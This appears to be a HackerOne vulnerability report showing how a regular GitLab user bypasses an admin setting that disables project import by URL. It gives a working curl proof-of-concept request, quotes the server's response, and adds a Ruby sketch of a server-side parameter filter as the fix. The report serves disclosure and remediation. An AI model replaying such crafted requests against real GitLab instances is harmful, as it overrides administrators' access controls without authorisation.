ESCALATED: Bypass Disabled Repo by URL Project Creation
**[HackerOne report #630263](https://hackerone.com/reports/630263)** by `ngalog` on 2019-06-26, assigned to `estrike`:
### Summary
As an admin, you can disable Repo by URL project creation on the admin page `https://:gitlab_instance/admin/application_settings`.
However, a user can still import a project using Repo by URL regardless of that setting.
### Steps to reproduce
- As an admin, disable the `Repo by URL` import source in `/admin/application_settings/general` under `Visibility and access controls`

- As a regular user, run the following curl command:
```bash
# $COOKIE is the regular user's session cookie and $VALID_AUTHENTICITY_TOKEN the
# matching CSRF token from a page rendered for that session.
curl 'http://gitlab.local/-/projects' \
-H 'Content-Type: application/x-www-form-urlencoded' \
-H "Cookie: $COOKIE" \
--data-raw "utf8=%E2%9C%93&authenticity_token=$VALID_AUTHENTICITY_TOKEN&project%5Bimport_url%5D=https%3A%2F%2Fgitlab.com%2Fgitlab-org%2Frelease-cli.git&project%5Bimport_url_user%5D=&project%5Bimport_url_password%5D=&project%5Bci_cd_only%5D=false&project%5Bname%5D=Importing+Even+If+Disabled&project%5Bnamespace_id%5D=7&project%5Bpath%5D=importing-even-if-disabled&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0"
```
This command sends a request equivalent to the one the `Repo by URL` import method in the UI submits. It imports the `gitlab-org/release-cli` project by URL. In my case I got the response
```html
<html><body>You are being <a href="http://gitlab.local/attacker/importing-even-if-disabled">redirected</a>.</body></html>
```
and the project was imported anyway.
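The missing piece is a server-side check: the `import_url` fields must be dropped or rejected whenever the Repo by URL source is disabled, instead of relying on the UI to hide the form. The following is an added illustration, not GitLab's code; it assumes the application setting lists the Repo by URL source under the name `git` (as in GitLab's `import_sources`) and uses a constructed request body modelled on the curl command above.

```ruby
require 'uri'

# Constructed sample body: the request from the report with the
# authenticity token and unused fields removed.
SAMPLE_BODY = 'utf8=%E2%9C%93' \
  '&project%5Bimport_url%5D=https%3A%2F%2Fgitlab.com%2Fgitlab-org%2Frelease-cli.git' \
  '&project%5Bimport_url_user%5D=&project%5Bimport_url_password%5D=' \
  '&project%5Bname%5D=Importing+Even+If+Disabled' \
  '&project%5Bpath%5D=importing-even-if-disabled&project%5Bvisibility_level%5D=0'

# Parse Rails-style "project[import_url]=..." keys into nested hashes,
# e.g. {"project" => {"import_url" => "https://..."}}. Top-level keys
# without brackets ("utf8") are kept as plain values.
def parse_nested_form(body)
  result = {}
  URI.decode_www_form(body).each do |key, value|
    if (m = key.match(/\A(\w+)\[(\w*)\]\z/))
      (result[m[1]] ||= {})[m[2]] = value
    else
      result[key] = value
    end
  end
  result
end

# The three parameters that drive a Repo by URL import.
IMPORT_URL_KEYS = %w[import_url import_url_user import_url_password].freeze

# Hypothetical policy check: Repo by URL is allowed only when the admin
# has left the "git" import source enabled.
def import_url_allowed?(enabled_import_sources)
  enabled_import_sources.include?('git')
end

# Hypothetical server-side filter applied before project creation: strip
# the import_url parameters when the source is disabled so that a crafted
# POST cannot reach the import code path. Returns the sanitised params and
# whether anything was stripped (useful for logging bypass attempts).
def filter_project_params(project_params, enabled_import_sources)
  return [project_params, false] if import_url_allowed?(enabled_import_sources)

  filtered = project_params.reject { |k, _| IMPORT_URL_KEYS.include?(k) }
  [filtered, filtered.size != project_params.size]
end
```

A denied request whose `import_url` was non-empty is worth logging with the user and namespace, since it only arises from a request that bypassed the UI.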
### Impact
Bypass of project creation via Repo by URL despite the admin setting explicitly disallowing it.
### What is the current *bug* behavior?
Bypass of project creation via Repo by URL despite the admin setting explicitly disallowing it.
Reproduced on GitLab CE 11.11.3 (gitlab-ce@e3eeb779d72006b9fbbaecf9f1d8fbd52a7d6383).
## Impact
Bypass of project creation via Repo by URL.